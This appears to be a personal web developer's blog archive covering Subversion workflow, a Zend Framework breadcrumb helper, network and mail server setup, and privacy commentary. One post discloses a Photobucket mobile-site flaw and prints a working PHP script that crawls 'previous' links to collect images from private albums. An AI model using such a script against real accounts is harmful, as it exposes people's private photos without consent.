Joey Adams Dot Net

Southern Fried Programming


Subversive Development for the Serious Web Professional

I won’t go into detail explaining version control, because there are countless articles and papers in the wild about it. I am, however, going to explain how I am integrating Subversion into my current development environment.

First, my reasons for using version control:

  • No SPOF (single point of failure) - My workflow always has three concurrent copies of the source at any given point, so if one machine fails fatally, my project data is still safe.
  • Repository - Having a repository means I can revert to older versions if needed, as well as keep track of the changes made at each step along the way.
  • No direct editing - I never have to touch the staging or live servers; I only modify the development copy, so human error is reduced ten-fold.

Here is how it all works.

I have three machines, dev/repo/serv, where dev is my development workstation, repo is the machine hosting the Subversion repository, and serv is my HTTP server.

On the HTTP server, in my projects directory, there is a folder for each project I am working on. Inside each project folder there are three more folders: dev/staging/live.

Using virtual hosts on httpserv, I make the development folder accessible only from my local network, the staging folder is password protected, and the live folder is publicly available.

I use Zend Studio for Eclipse with a Subversion/PHP project and use WebDrive to securely map the project’s dev folder onto my local machine. I create/edit/modify project files from my workstation (which holds a cache of the project files) in the dev folder on my HTTP server.

I edit files from my workstation and view the changes on the development vhost. Once I finish adding a module/functionality/milestone to the project and want the client’s approval, I use a script called svn_sync.sh located in each project’s main directory.

svn_sync.sh first makes sure you have committed your changes to the trunk (aka the dev folder); after that you specify which source you want to merge and update. Once I finish adding features, I merge the trunk into the staging branch and update the working copy inside the staging folder. I can now show the client the changes.

Once I have his approval, I run svn_sync.sh again and have it merge the staging branch into the live branch, and then update the live directory, aka the live server.

That is my SDLC (software development life-cycle). Things are neat and tidy, and I only make changes to the trunk/development folder of the project.

This method is everything I could wish for: highly available, reliable, robust, scalable, and professional.

Sure, direct editing and cp -r work, and I may be overdoing it as a single developer, but I am very happy with my results and would recommend the same to anyone wanting the experience.

Web Application Security Survey

It is unarguable that Jeremiah Grossman is a pretty big name in web application security. I really enjoy reading his and Robert (aka Mr. XSS, RSnake) Hansen’s posts. They tend to have a lot of great info, and a lot of fun things to be a part of.

Jeremiah has his W.A.S. survey up for anyone who works around the field to take. Some of the questions are really inquisitive.

Anyway, if you work around the field, you should take the survey. Head on over to his site to take it.

View private Photobucket accounts via Mobile-Web

Photobucket has done it again. It appears that, using the mobile-web domain (m55.photobucket.com), if you navigate to a valid image you can use the previous/next links to view more photos in the account, even if it is set to private.

I have not checked, but I believe the hole has been patched. I was informed of this exploit by a friend, Jessie McKnight. The catch was that the prev/next buttons are initially very small (hence mobile web), and clicking all those links takes a lot of time.

I hacked up a working script in about an hour that takes a valid picture URL and visits it, scrapes the previous link, copies the image name and writes it encapsulated in an image tag to an HTML file using the original Photobucket URL (not the mobile domain), then repeats this process on the URL obtained from the prev anchor.

This was a very intensive process, so I capped it at 50 requests; storing the pictures on a separate page allowed for quicker retrieval while the script was crawling, and also saved the results from different people using the script at the same time.

This is in no way an optimized script; it was thrown together from scratch to completion in under an hour, but it is just a P.O.C.

<form method="GET" action="">
URL TO VALID PICTURE: <input type="text" name="album"><br/>
<input type="submit">
</form>

<?php
// P.O.C. from the post: starting at one valid picture URL, follow the mobile
// site's "previous" links and record every image reached as an <img> tag.

if(isset($_GET['album'])){
	$fh = fopen('photos.html','a');
	$get_album = $_GET['album'];
	// Split the submitted URL into the picture file name and the album URL.
	$picture = substr(substr($get_album,strrpos($get_album,'/')),1);
	$albumurl = substr($get_album,0,strrpos($get_album,'/'));
	$album = substr(substr($albumurl,strrpos($albumurl,'/')),1);
	// The same picture, addressed through the mobile-web domain.
	$url = "http://m55.photobucket.com/albumview/albums/{$album}/{$picture}.html?";
	// Capped at 50 requests, as described above.
	$i=0;
	while($i < 50){
		$url = getPrevUrl($url);
		$im = getImage($url,$albumurl);
		fwrite($fh,$im);   // results go to a separate page
		echo $im;
		$i++;
	}
	fclose($fh);
}

// Fetch a mobile page and return the absolute URL of its "previous" link
// (the fifth anchor on the page when this was written). If the page cannot
// be parsed, the current URL is returned unchanged.
function getPrevUrl($url){
	$input = @file_get_contents($url) or die("Could not access file: $url");
	$regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
	if(preg_match_all("/$regexp/siU", $input, $matches) && isset($matches[2][4])) {
		return "http://m55.photobucket.com" . $matches[2][4];
	}else{
		return $url;
	}
}

// Turn a mobile page URL back into an <img> tag pointing at the image under
// the original (non-mobile) album URL.
function getImage($url,$alburl){
	$photoUrl = substr($url,0,strrpos($url,"."));
	$photoUrl = substr($photoUrl,strrpos($photoUrl,"/"));
	$photoUrl = $alburl . $photoUrl;
	return "<img src='$photoUrl'/><br/>";
}

Major ISPs agree on child pornography filtering

I have not gone into detail about this agreement, but you can be certain that whenever ISPs band together to prevent something, it hurts the consumer.

Filtering slows down speeds (minutely), but the real flaw in filtering is the use of an uncertain list. Whitelisting or blacklisting, there are ALWAYS false positives when you do not have an exact plain-text match.

I am definitely against child pornography; however, false positives from filtering, and the way some ISPs like to communicate with law enforcement, could cause a myriad of problems for everyday households. Prosecution should be done through cooperation with the web hosting companies that host accounts with this type of content. Filtering is not mature enough yet.

For instance, for AT&T customers, even this blog post might be filtered away in the coming year, just for its title.

Filtering, throttling, anything other than providing direct internet connectivity is a horrible breach of trust and net neutrality. Boo!

WTF Facebook!?

If you haven’t heard about Beacon in Facebook publishing private data, then you have been under a rock. But wait, Beacon is now an opt-out service, so this is old news, right?

Wrong!

According to a post on Slashdot, Beacon still tracks you whether you are logged into Facebook or not. I had high hopes for Facebook, being an advocate of PHP and open source technology, but shame, shame on you, Facebook.

This issue needs more spotlight.

Home Server Speed + Development Changes

Last week I moved everything in a couple of rooms of the house around, and now my workstation and server cabinet are in my room (and it is hot as hell; I run about 4 electric fans plus the ceiling fan just to cool down).

I am now in a situation that is fun for any enthusiast. I love redoing the network, or just working on it. I am seeing some speed issues with this site and my other projects. Of course these are not meant to be highly available or that fast anyway, but they are suffering performance issues greatly.

I suspect the rackmount hub in the cabinet that connects the servers to the network. I am going to try to get a rackmount switch and see if that helps, which it should.

The network environment is a mess right now, although an ordered mess, haha. I need to build the rest of a PC to have in the living room to power the extender for my home PVR. I am going to just use a crossover cable to connect the two, then connect the PC wirelessly to the network to get updates and guides.

The Windows server is not running the print server correctly, nor have I finished setting up the fax, because I lack another phone. So if you call the house 3 times, you get data tones :) .

I have also switched my development flow to using Subversion and never touching production folders. I am using WebDrive to map the projects directory to my PC, and using Zend Studio’s SVN functions to make changes to the trunk of the project’s repo, which runs on the Windows server. Whenever I am ready to show a client a new feature, I copy the trunk to the staging branch and update the staging directory.

The staging server is password protected so only the client and I can see development. The development server is only accessible to my local network. Once the client approves the changes, I copy the staging branch to the live branch, then update the live (production) folder.

This effectively makes several backups of the source, at different states, on different hard drives, and I never have to touch files in the production environment; this is a very important concept.
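The trunk -> staging -> live promotion described in the Subversion post above and recapped here, written out as an added example; this is not the author’s svn_sync.sh (which is never shown), and the repository layout (trunk, branches/staging, branches/live), the URL and the project path are assumptions. It refuses to promote while either working copy has uncommitted changes, merges the source branch into the target working copy, commits that merge, and updates the target folder.

```shell
# svn_sync.sh-style promotion script (added example, not the author's script).
# Assumed layout: $REPO_URL/{trunk,branches/staging,branches/live}, checked
# out as $PROJECT_DIR/{dev,staging,live}.
set -eu

REPO_URL="${REPO_URL:-svn://repo.example/projects/myproject}"  # assumed
PROJECT_DIR="${PROJECT_DIR:-/var/www/projects/myproject}"      # assumed
SVN="${SVN:-svn}"  # point at a wrapper/function to dry-run without a repo

# Repository path behind each working folder.
branch_path() {
  case "$1" in
    dev)     echo "trunk" ;;
    staging) echo "branches/staging" ;;
    live)    echo "branches/live" ;;
    *)       return 1 ;;
  esac
}

# Only dev -> staging and staging -> live are allowed: nothing merges back
# into trunk, and live is never a source.
promote_target() {
  case "$1" in
    dev)     echo "staging" ;;
    staging) echo "live" ;;
    *)       return 1 ;;
  esac
}

# "svn status -q" prints nothing for a clean working copy, so any output
# means uncommitted work and the promotion is refused.
check_clean() {
  if [ -n "$($SVN status -q "$1")" ]; then
    echo "uncommitted changes in $1; commit to the repository first" >&2
    return 1
  fi
}
# sync_branch dev|staging : merge the source branch into the next stage's
# working copy, commit that merge, and bring the stage's folder up to date.
sync_branch() {
  src="$1"
  dst="$(promote_target "$src")" || { echo "cannot promote '$src'" >&2; return 1; }
  check_clean "$PROJECT_DIR/$src" || return 1  # the author's "did you commit?" step
  check_clean "$PROJECT_DIR/$dst" || return 1  # and never merge onto a dirty target
  $SVN merge "$REPO_URL/$(branch_path "$src")" "$PROJECT_DIR/$dst" || return 1
  $SVN commit -m "svn_sync: merge $src into $dst" "$PROJECT_DIR/$dst" || return 1
  $SVN update "$PROJECT_DIR/$dst"
}
if [ -n "${1:-}" ]; then sync_branch "$1"; fi
```

Run it from the project directory as `sh svn_sync.sh dev` to publish to staging and `sh svn_sync.sh staging` to go live; the live folder is only ever written to by the final `svn update`.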

Just a note on Zend Studio (I am using ZS for Eclipse): I really wish it had some type of remote SVN project resource, or even a remote project resource so that you could have, say, a ‘php’ or ‘framework’ project without hacking up the project settings. It was just very difficult to use its built-in project settings with SVN on a remote server, which is a very, very common development environment.

Zend has just never been very good with community support. I am not sure about their product support, but the forums are a ghost town and offer little help, and emailing them does hardly any good, ALTHOUGH that may have changed.

I submitted several requests to a lot of different emails about my profile in the Zend Yellow Pages after getting my ZCE, because I could not edit the details. This was about a year and a half ago; just a few weeks ago I received an email saying it was fixed, haha.

So maybe they have a new support team.

I will write up some network statistics after the change, and a how-to for Subversion development at home.

Breadcrumbs with Zend Framework

I was integrating breadcrumbs into a site I am currently building and figured I would share the code I used to make it possible.

This project uses a MODULAR layout, so none of the solutions out there helped me. I wanted it to display cleanly, without showing things like ‘default’ as the module name, and not to display a breadcrumb on the home page (i.e. default module, index controller, index action).

Basically it is a view helper that you call, and it fetches everything for you.

Some things to know: it pulls ‘siteurl’ from Zend_Registry. You can change this if you want; well, you can change anything you want. It’s nothing special, but it may help someone out there.

Just add this view helper:

<?php

/**
 * BreadCrumb View Helper
 * @author Joey Adams
 *
 * Builds "Home > module > controller > action" for a modular layout. The
 * 'default' module name is never shown and the home page gets no crumb.
 */
class ViewHelpers_BreadCrumb {

	public function breadCrumb() {
		$request = Zend_Controller_Front::getInstance()->getRequest();

		$module = $request->getModuleName();
		$l_m = strtolower($module);

		$controller = $request->getControllerName();
		$l_c = strtolower($controller);

		$action = $request->getActionName();
		$l_a = strtolower($action);

		// HomePage = No Breadcrumb
		if($l_m == 'default' && $l_c == 'index' && $l_a == 'index'){
			return;
		}

		// These names come from the request path, so escape them before
		// they are written into markup.
		$module     = htmlspecialchars($module, ENT_QUOTES, 'UTF-8');
		$controller = htmlspecialchars($controller, ENT_QUOTES, 'UTF-8');
		$action     = htmlspecialchars($action, ENT_QUOTES, 'UTF-8');

		// Get our url and create a home crumb
		$url = Zend_Registry::get('siteurl');
		$homeLink = "<a href='{$url}/'>Home</a>";

		// Start crumbs
		$crumbs = $homeLink . " > ";

		// If our module is default
		if($l_m == 'default') {
			if($l_a == 'index'){
				$crumbs .= $controller;
			} else {
				$crumbs .= "<a href='{$url}/{$controller}/'>$controller</a> > $action";
			}
		} else {
			// Non Default Module
			if($l_c == 'index' && $l_a == 'index') {
				$crumbs .= $module;
			} else {
				$crumbs .= "<a href='{$url}/{$module}/'>$module</a> > ";
				if($l_a == 'index') {
					$crumbs .= $controller;
				} else {
					$crumbs .= "<a href='{$url}/{$module}/{$controller}/'>$controller</a> > $action";
				}
			}
		}
		return $crumbs;
	}

}

Zend Studio, Fedora Core 9, and my laptop dv8000

I’ve been dying to have a Linux workstation. I have BackTrack 3 installed in a VM on my desktop, but that is not enough. I miss my Gentoo installation and considered it, but it just takes too long and my schedule is more than full.

I cannot change over my desktop OS due to using Media Center for my home PVR (see other posts for details), and also because I game every now and then and use the CS3 suite, so oh well. Dual booting is not worth it when I can work off a VM.

So my laptop is the choice then, semi-broken screen and all. I decided to go with Fedora: it’s an easy install, a programmer’s type of distro, and I am familiar with it from the past. I downloaded Fedora 9 Sulphur for amd64; the install was FLAWLESS, just perfect. Boot up, and everything works like it is supposed to.

Zend Studio Fedora 9


LifeLock CEO... Identity Gets Stolen

Keep knocking on the Devil’s door and someone is bound to answer. And answer they did when Todd Davis, CEO of LifeLock, had his identity stolen: the exact thing his entire company is responsible for stopping. This has got to be one of the greatest things I have seen in a while. I cannot even think about it without laughing. I have no idea if the SSN he was ‘giving away’ in those commercials was valid or not, but when you put yourself in the public cross-hairs like that, you should expect things to happen.

From what I have read, his company is being sued by some individuals for misconception, or deception, or something or another. This may have been one mishap, and I do not want to discredit the entire company (shit happens); I really like services like these with the number of ID thefts going around these days. I am not, however, for deception and trying to make money off the weakness of good-willing people. Robert Hansen, or RSnake, has done some looking and found some pretty weird wording on their site.

All in all, a good laugh.

AT&T/BellSouth Filtering Outbound SMTP vs. My Postfix and IIS Mail Servers

If I have ever spoken to you regarding mail servers, it was probably a frustrating conversation. Mail servers and I just do not get along. I have tried numerous times on all sorts of platforms, from Unix to Linux and Windows, to get Sendmail, Postfix, even IIS to work correctly.

Well, as a developer, I need mail functionality in my PHP applications. I would also like joeyadams.net and my other domains to be able to have unique email addresses. I already have a Windows 2k3 server set up for file/print and previously for mail with Exchange, which actually worked... well, some of the time.

So here is my plan: on my Red Hat box, ditch Sendmail and use Postfix. On Win2k3, set up simple IIS SMTP and POP3 services.
